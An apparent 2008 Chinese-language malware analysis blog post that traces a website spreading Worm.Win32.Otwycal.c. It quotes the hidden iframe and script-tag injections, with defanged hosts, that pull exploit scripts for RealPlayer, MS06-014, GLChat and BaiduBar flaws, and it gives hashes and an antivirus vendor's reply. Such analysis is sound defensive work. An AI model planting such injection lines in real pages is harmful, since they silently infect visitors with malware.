一个传播 Worm.Win32.Otwycal.c / Worm.Win32.Infei.a 的网站
endurer 原创
2008-04-07 第2版 补充瑞星的回复
第1版
该网站首页包含代码:
/---
document.write("<iframe src=hxxp://a**.1**58d**m.com/b2.htm width=0 height=0></iframe>")
---/
#1 hxxp://a**.1**58d**m.com/b2.htm(Kaspersky 已检测到: 木马程序 Trojan-Clicker.HTML.IFrame.mv )包含代码:
/---
<script language=javascript src=hxxp://b**.1**58d**m.com/one/ok.js></script>
<iframe src=hxxp://b**.1**58d**m.com/one/ok.htm width=1 height=1 border=1></iframe>
---/
#1.1 hxxp://b**.1**58d**m.com/one/ok.js
利用 RealPlayer rmoc3260.dll(clsid:2F542A2E-EDC9-4BF7-8CB1-87C9919F7F93)漏洞下载hxxp://c**.1**58d**m.com/ok.exe
文件说明符 : D:/test/ok.exe
属性 : A---
获取文件版本信息大小失败!
创建时间 : 2008-4-7 12:50:34
修改时间 : 2008-4-7 12:50:34
访问时间 : 2008-4-7 12:51:15
大小 : 14680 字节 14.344 KB
MD5 : 2f2dac719cf3ead013c54cccc877f41b
SHA1: F46280F1B37D1D1203333129A7F8A6FE89B7A951
CRC32: 1edd2726
Kapsersky 报为 Worm.Win32.Otwycal.c (http://www.viruslist.com/en/find?words=Worm.Win32.Otwycal.c)
病毒上报邮件分析结果-流水单号:20080407125605658606 2008.04.07 19:48
尊敬的客户,您好!
您的邮件已经收到,感谢您对瑞星的支持。
我们已经详细分析过您的问题和文件,以下是您上传的文件的分析结果:
1.文件名:ok.exe
病毒名:Worm.Win32.Infei.a
您所上报的病毒文件将在瑞星2008的20.39.10版本(瑞星2007的19.70.10版本)中处理解决。
#1.2 hxxp://b**.1**58d**m.com/one/ok.htm
检测cookie变量OK的值,输出代码:
/---
<script src=hxxp://b**.1**58d**m.com/one/14.js></script>
<script src=hxxp://b**.1**58d**m.com/one/rl.js></script>
<script src=hxxp://b**.1**58d**m.com/one/lz.js></script>
---/
#1.2.1 hxxp://b**.1**58d**m.com/one/14.js
利用 MS06-014漏洞下载 hxxp://c**.1**58d**m.com/ok.exe
#1.2.2 hxxp://b**.1**58d**m.com/one/lz.js
利用 联众(GLCHAT.GLChatCtrl.1)漏洞下载 hxxp://c**.1**58d**m.com/ok.exe
#1.2.3 hxxp://b**.1**58d**m.com/one/rl.js
利用 RealPlayer(IERPCtl.IERPCtl.1)漏洞下载 hxxp://c**.1**58d**m.com/ok.exe
#1.2.4 利用 BaiduBar.Tool 下载 hxxp://c**.1**58d**m.com/Baidu.cab,内含 new.exe